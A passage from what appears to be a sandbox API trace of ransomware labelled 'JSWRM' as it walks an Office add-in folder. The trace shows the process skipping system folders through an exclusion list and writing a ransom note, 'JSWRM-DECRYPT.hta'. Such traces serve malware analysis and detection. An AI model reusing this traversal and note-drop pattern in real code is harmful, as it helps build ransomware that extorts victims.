cAlternateFileName="")) returned 1 [0124.383] lstrcmpiW (lpString1="kk", lpString2=".") returned 1 [0124.383] lstrcmpiW (lpString1="kk", lpString2="..") returned 1 [0124.383] lstrcmpiW (lpString1="kk", lpString2="...") returned 1 [0124.383] lstrcmpiW (lpString1="kk", lpString2="windows") returned -1 [0124.383] lstrcmpiW (lpString1="kk", lpString2="recovery") returned -1 [0124.383] lstrcmpiW (lpString1="kk", lpString2="perflogs") returned -1 [0124.383] lstrcmpiW (lpString1="kk", lpString2="documents and settings") returned 1 [0124.383] lstrcmpiW (lpString1="kk", lpString2="$RECYCLE.BIN") returned 1 [0124.383] lstrcmpiW (lpString1="kk", lpString2="system volume information") returned -1 [0124.383] lstrcmpiW (lpString1="kk", lpString2="msocache") returned -1 [0124.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0124.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0124.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0124.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0124.383] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0124.383] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0124.383] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\kk\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\kk\\jswrm-decrypt.hta")) returned 0xffffffff [0124.384] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0124.384] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0124.384] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0124.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0124.384] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24e1d8 [0124.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0124.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24ffa8 [0124.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0124.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236018 [0124.385] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e110 [0124.385] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236018 | out: hHeap=0x1e0000) returned 1 [0124.385] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\kk\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\kk\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0124.386] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.386] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0124.387] CloseHandle (hObject=0x314) returned 1 [0124.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0124.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ffa8 | out: hHeap=0x1e0000) returned 1 [0124.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0124.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0124.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0124.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0124.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0124.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e110 [0124.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0124.387] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\kk\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\kk\\jswrm-decrypt.hta")) returned 0x20 [0124.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0124.387] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0124.387] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0124.387] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\kk\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfae6f174, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x14b330aa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x40cc76da, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x232080 [0124.387] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0124.387] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfae6f174, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x14b330aa, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x40cc76da, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0124.387] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0124.387] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0124.387] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc34bb5b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc34bb5b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x14bf1c4b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc4a40, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AdHocReportingExcelClient.dll", cAlternateFileName="ADHOCR~1.DLL")) returned 1 [0124.387] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2=".") returned 1 [0124.387] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="..") returned 1 [0124.388] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="...") returned 1 [0124.388] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="windows") returned -1 [0124.388] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="recovery") returned -1 [0124.388] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="perflogs") returned -1 [0124.388] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="documents and settings") returned -1 [0124.388] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.388] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="system volume information") returned -1 [0124.388] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="msocache") returned -1 [0124.388] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0124.388] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0124.388] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0124.388] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x241128, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0124.388] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0124.388] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0124.388] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0124.388] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0124.388] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x241178, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0124.388] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0124.388] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b398 [0124.388] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0124.388] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0124.388] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0124.388] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40cc76da, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x40cc76da, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x40cc76da, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0124.388] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0124.388] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0124.388] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0124.388] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0124.388] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0124.388] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0124.388] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0124.388] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0124.388] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0124.388] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0124.388] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0124.388] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0124.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0124.389] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241330, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0124.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0124.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0124.389] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0124.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0124.389] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0124.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0124.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0124.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b398 | out: hHeap=0x1e0000) returned 1 [0124.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0124.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0124.389] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfae6f174, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfae6f174, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfae6f174, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x17040, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.PowerBI.Diagnostics.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0124.389] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2=".") returned 1 [0124.389] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="..") returned 1 [0124.389] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="...") returned 1 [0124.389] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="windows") returned -1 [0124.389] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="recovery") returned -1 [0124.389] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="perflogs") returned -1 [0124.389] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="documents and settings") returned 1 [0124.389] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.389] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="system volume information") returned -1 [0124.389] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="msocache") returned -1 [0124.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0124.389] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0124.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0124.389] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d260, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0124.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0124.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0124.389] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0124.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0124.389] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22d298, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0124.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0124.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0124.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0124.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0124.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0124.390] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfc2d943c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfc2d943c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfc2d943c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x14078, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0124.390] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2=".") returned 1 [0124.390] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="..") returned 1 [0124.390] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="...") returned 1 [0124.390] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="windows") returned -1 [0124.390] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="recovery") returned -1 [0124.390] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="perflogs") returned -1 [0124.390] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="documents and settings") returned 1 [0124.390] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.390] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="system volume information") returned -1 [0124.390] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpString2="msocache") returned -1 [0124.390] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0124.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.390] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0124.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dba8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0124.390] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0124.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.390] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0124.390] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d698, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0124.390] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23f848 [0124.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0124.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0124.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0124.390] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfb8dd674, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfb8dd674, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfb8dd674, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x7aa8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0124.390] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2=".") returned 1 [0124.390] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="..") returned 1 [0124.390] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="...") returned 1 [0124.390] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="windows") returned -1 [0124.390] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="recovery") returned -1 [0124.390] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="perflogs") returned -1 [0124.391] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="documents and settings") returned 1 [0124.391] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.391] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="system volume information") returned -1 [0124.391] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="msocache") returned -1 [0124.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224d50 [0124.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d770 [0124.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d770, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224d50 | out: hHeap=0x1e0000) returned 1 [0124.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0124.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0124.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dba8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 